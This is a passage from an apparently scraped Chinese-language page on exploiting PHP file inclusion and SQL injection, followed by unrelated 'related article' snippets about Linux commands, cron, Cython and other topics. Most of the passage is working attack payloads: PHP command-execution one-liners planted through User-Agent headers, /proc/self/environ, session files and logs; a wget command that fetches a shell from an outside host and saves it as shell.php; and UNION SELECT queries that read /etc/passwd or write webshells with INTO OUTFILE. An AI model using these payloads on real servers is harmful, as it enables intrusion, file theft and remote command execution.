如果不成功,把<?转为16进制 。

不行的话还可以把段字符放在header字段里面,比如说User-Agent、Referer

利用方式2:通过环境变量进行插入

/proc/self 指向最后一个PID使用的链接。

/proc/self/environ 是一个已知的路径,但是一般用户没权限读取。

在linux系统中,/proc/self是因为是个能写的环境变量,而且位置是固定的。

利用的话先把利用代码放在User-Agent进行提交,

然后请求:http://host/?file=../../../proc/self/environ&cmd=uname -a

利用方式3:将代码插入到图片中

讲一句话添加到图片中,然后上传直接利用。

http://host/?file=path/avatar.gif&cmd=uname -a

利用方式4:将代码插入到session文件中

如果是通过session验证的,并且知道session的字段。

http://host/?user= passthru($_GET[cmd]) ?>

找session值(浏览器)和文件位置(一般/tmp/session值)。

然后直接包含。

利用方式5: 其他文件

其他日志,FTP的话提交用户名为 passthru($_GET[cmd]) ?>

服务器版本较老的话,可以利用PUT方式提交代码。

利用方式6:获取shell

http://host/?file=xxxx&cmd=wget http://devil/shell.txt -O shell.php

3、注入与文件包含

方式1:注入读取关键文件

http://host/?id=-1 UNION SELECT 1,2,3,load_file(‘/etc/passwd’);

magic_quotes开启的话

http://host/?id=-1 UNION SELECT 1,2,3,load_file(0x2f6574632f706173737764);

方式2:先导出然后读取

http://host/?id=1 outfile “/tmp/sql.txt”

http://host/?id=-1 UNION SELECT 1,2,3,load_file(‘/tmp/sql.txt’);

方式3:直接生成一句话

http://host/?id=-1 union select 1,load_file(“/etc/passwd”),1 into outfile “/var/www/host.com/www/passwd”

http://host/?id=-1 union select 1,”<?phpinfo ()?>”,1 into outfile “/var/www/host.com/www/phpinfo.php”

如果目录不能写,可以先导出到tmp

http://host/?id=-1 union select 1,” passthru($_GET[cmd]) ?>”,1,1 into outfile “/tmp/sql.txt”

php命令执行脚本文件,PHP文件包含与命令执行方式总结相关推荐

  1. Linux命令+shell脚本大全:文件和目录列表

    要想知道系统中有哪些文件,可以使用列表命令( ls ).本节将描述 ls 命令和可用来格式化 其输出信息的选项. 3.5.1 基本列表功能 ls 命令最基本的形式会显示当前目录下的文件和目录: $ l ...

  2. linux 每周日执行脚本,Linux任务计划和周期性任务执行

    linux计划任务有两类 at:未来某个时间点仅执行一次任务就结束的指令,at指令执行时必须要有atd这个服务支持. crontab:可以以时间单位为分钟,小时,每天,每周,每月,每年等循环执行某任务 ...

  3. 离线调用linux命令,GitHub - rinetd/linux-command: Linux命令大全搜索工具,内容包含Linux命令手册、详解、学习、搜集。...

    Linux Command 516 个 Linux 命令大全,内容包含 Linux 命令手册.详解.学习,值得收藏的 Linux 命令速查手册.请原谅我写了个爬虫,爬了他们家的数据linuxde.ne ...

  4. 实验楼linux命令,GitHub - encorechow/linux-command: Linux命令大全搜索工具,内容包含Linux命令手册、详解、学习、搜集。...

    Linux Command 516 个 Linux 命令大全,内容包含 Linux 命令手册.详解.学习,值得收藏的 Linux 命令速查手册.请原谅我写了个爬虫,爬了他们家的数据linuxde.ne ...

  5. spark常用的linux命令,GitHub - Sparkinzy/linux-command: Linux命令大全搜索工具,内容包含Linux命令手册、详解、学习、搜集。...

    Linux Command 516 个 Linux 命令大全,内容包含 Linux 命令手册.详解.学习,值得收藏的 Linux 命令速查手册.请原谅我写了个爬虫,爬了他们家的数据linuxde.ne ...

  6. crontab执行脚本发邮件中文乱码,手动执行没有问题

    今天写了个脚本,定时给指定邮箱发送邮件,手动执行的时候没有问题,但添加到计划任务后发送的邮件就中文乱码,变成一个不知名的附件形式: 上网查了下原因 产生原因: 这是因为Unix/Linux下使用cro ...

  7. node.js require 自动执行脚本 并生成html,从HTML页面执行Nodejs脚本?

    小编典典 我使用普通的JS而非咖啡脚本,因此这是每个Fosco注释(称为server.js)的示例: var express = require('express'), list = require( ...

  8. Vbs脚本将本地文件上传到Azure存储账户

    说到Azure相信大家都已经非常熟悉了,所以就不做多介绍了,我们都知道在Azure上有一个存储账户,在存储账户下可以可以创建容器,可以存放数据,近期公司呢为了达到数据的安全性,准备将本地的备份数据给A ...

  9. PHP 命令行模式实战之cli+mysql 模拟队列批量发送邮件(在Linux环境下PHP 异步执行脚本发送事件通知消息实际案例)...

    源码地址:https://github.com/Tinywan/PHP_Experience 测试环境配置: 环境:Windows 7系统 .PHP7.0.Apache服务器 PHP框架:ThinkP ...

  10. 后台执行UNIX/Linux命令和脚本的五种方法

    http://hankjin.blog.163.com/blog/static/337319372010111492348473/ 2010-12-14 09:35:48|  分类: Unix |   ...

最新文章

  1. 开源云联盟耿航:中国开源软件的发展趋势
  2. php处理不确定笛卡尔积,PHP笛卡尔积实现算法示例
  3. LDD3源码分析之ioctl操作 .
  4. 1270: [BeijingWc2008]雷涛的小猫
  5. WinCC归档数据报表控件
  6. ES语法及-IK分词器
  7. 如何在Word,Excel和PowerPoint 2010中裁剪图片
  8. 【专升本计算机】2021年甘肃省专升本计算机全真模拟试题(二)
  9. 谢烟客---------Linux之DNS服务系统的基础知识
  10. 【操作系统】系统调用
  11. 数据结构-排序基础代码
  12. 中国物联网发展年报出炉
  13. linux如何删除tree命令,误删tree命令如何恢复
  14. BlackBerry7290软件安装——电子书阅读Mobipocket
  15. PMP证书真的有用吗?
  16. qcow2文件的snapshot管理
  17. 帆软函数:阿拉伯数字转中文、阿拉伯数字转人民币大写
  18. 《算法导论》学习笔记第一章
  19. dcs常用的冗余方式_dcs试题
  20. python篮球游戏单机下载_NBA 2K20

热门文章

  1. python textrank_TextRank算法提取文本摘要
  2. sql 临时表_深度分析 | JDBC与MySQL临时表空间的分析
  3. cython 安装升级_Anaconda安装pytorch,torchvision和 cython
  4. HNU 实验五 小女孩与楼梯
  5. nlp-tutorial代码注释1-2,词向量、Word2Vec、Skip-gram简述
  6. Could NOT find OpenSSL, try to set the path to OpenSSL root folder in the system variable
  7. [转]linux用户管理
  8. [转]nonlocal和global
  9. Altium AD20大电流表层开窗,用特殊粘贴复制平面区域到其他层,阻焊开窗显示沉金LOGO
  10. AMS磁编码器:AS5048与AS5047区别,伺服电机闭环系统位置反馈